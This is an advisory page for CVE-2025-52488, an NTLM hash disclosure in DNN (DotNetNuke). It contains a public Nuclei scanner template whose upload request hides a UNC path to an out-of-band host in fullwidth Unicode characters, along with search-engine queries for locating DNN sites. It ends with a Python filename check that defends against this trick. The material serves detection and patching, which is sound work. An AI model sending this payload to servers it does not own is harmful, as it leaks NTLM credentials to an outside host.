CVE-2025-52488: DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure

Date: 2025-08-01 | Affected software: DNN DotNetNuke | PoC: Public

Vulnerability description

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interactions to potentially expose NTLM hashes to a third-party SMB server. This issue has been patched in version 10.0.1.

PoC code [public]

id: CVE-2025-52488

info:
  name: DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure
  author: assetnote,DhiyaneshDk,iamnoooob,pdresearch
  severity: high
  description: |
    DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
  reference:
    - https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96
    - https://slcyber.io/assetnote-security-research-center/abusing-windows-net-quirks-and-unicode-normalization-to-exploit-dnn-dotnetnuke/#hunting-variants
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-52488
    cwe-id: CWE-200
    cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*
    epss-score: 0.35185
    epss-percentile: 0.96926
  metadata:
    verified: true
    max-request: 1
    vendor: dnnsoftware
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="dotnetnuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,file-upload,dotnetnuke,oast,oob,dnnsoftware,oss,ntlm,vkev

variables:
  payload: "%EF%BC%BC%EF%BC%BC{{interactsh-url}}%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx?PortalID=0&storageFolderID=1&overrideFiles=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXXXXXXX

        ------WebKitFormBoundaryXXXXXXXXXXXX
        Content-Disposition: form-data; name="file"; filename="{{url_decode(replace(payload,'.','%EF%BC%8E'))}}"
        Content-Type: image/jpeg

        {{randstr}}
        ------WebKitFormBoundaryXXXXXXXXXXXX--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: dsl
        dsl:
          - "contains(to_lower(header), 'dnn_ismobile')"
          - "contains_any(to_lower(body), 'dotnetnuke', 'dnnconnect', 'runtime error')"
        condition: or
# digest: 4b0a004830460221008b55a09670c839e492a5a50c9976e94faa76ca188748db6151a3c8a4966550da0221008aeec5157bb21bf0b1b02ae15c8517f4aa06470079a07da498b5493cab8a6bfb:922c64590222798bb761d5b6d8e72950
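
A defensive check for the filename handling this template exercises, as an added example that is not part of the template or of DNN's code: it applies NFKC compatibility normalization to an upload filename before validating it, so the fullwidth U+FF3C and U+FF0E characters used in the template's payload are evaluated as `\` and `.`. The function names and the sample filename (with the placeholder host files.example.test) are constructed for illustration.

```python
import unicodedata

# Characters that carry path meaning on Windows once a name is normalized.
PATH_SYNTAX = {"\\", "/", ":"}


def fold(name):
    """Compatibility-normalize a filename (fullwidth forms become ASCII)."""
    return unicodedata.normalize("NFKC", name)


def filename_findings(raw):
    """Return reasons to reject an upload filename; an empty list means accept."""
    findings = []
    folded = fold(raw)

    # Code points that look harmless raw but fold into a separator or a dot.
    hidden = sorted({
        f"U+{ord(ch):04X}" for ch in raw
        if fold(ch) != ch and set(fold(ch)) & (PATH_SYNTAX | {"."})
    })
    if hidden:
        findings.append("folds to path syntax: " + ", ".join(hidden))

    # Validate the normalized form, which is what later path handling may see.
    if set(folded) & PATH_SYNTAX:
        findings.append("path separator after normalization")
    if folded.startswith(("\\\\", "//")):
        findings.append("UNC prefix after normalization")
    return findings


# Constructed sample shaped like the template's filename: fullwidth
# backslashes (U+FF3C) and fullwidth full stops (U+FF0E), placeholder host.
SAMPLE = ("\uFF3C\uFF3Cfiles\uFF0Eexample\uFF0Etest"
          "\uFF3C\uFF3Cc$\uFF3C\uFF3Can\uFF0Ejpg")

if __name__ == "__main__":
    for name in ("holiday-photo.jpg", "caf\u00e9.png", SAMPLE):
        print(repr(name), "->", filename_findings(name) or "accept")
```

Running the same function over filenames recorded in upload logs gives a retrospective check for requests of this shape against unpatched versions.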
